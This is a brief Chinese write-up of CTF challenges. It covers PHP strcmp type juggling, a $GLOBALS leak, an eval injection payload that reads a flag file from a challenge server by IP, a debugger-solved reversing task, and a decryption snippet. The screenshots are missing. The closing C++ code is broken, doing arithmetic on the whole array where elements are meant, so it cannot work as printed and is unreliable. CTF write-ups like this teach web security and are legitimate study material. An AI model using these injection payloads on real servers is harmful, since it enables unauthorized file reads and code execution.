WriteUp

Posted on | In

Adventures in PHP (0)

php是一种弱类型的语言,
当strcmp接收到字符串以外的数据时会返回NULL
所以 payload: http://95.179.228.15:8000/?flag[]=123
1

Adventures in PHP (1)

PHP在名为$GLOBALS[index]的数组中存储了所有全局变量,且变量的名字就是数组的键,这种全局变量可以在PHP脚本中的任意位置访问全局变量
payload:http://95.179.228.15:8001/?args=GLOBALS
2

Is everything injectable?

本题flag包含在两个php中
第一个: 也是利用全局变量就可以拿到flag
payload:http://95.179.228.15:8005/index1.php?args=GLOBALS
3

第二个:利用eval构造php语句然后读取flag2.php的信息,得到flag
payload:http://95.179.228.15:8005/index2.php?hello=);print_r(file(%22./flag2.php%22));//
4

FlagSearching

5

在调试器中找到这段话,一路单步跟下去。

6

这一段就是flag了。

BabyEncryption

加密输入的字符串

7

比较加密后的字符串

8

解密

1
2
3
4
5
6
7
8
9
char a[] = "WelcomeToAegis";
int main(){
    while(*a){
        a += 4;
        a ^= 1;
        a++;
    }
    cout << a << endl;
}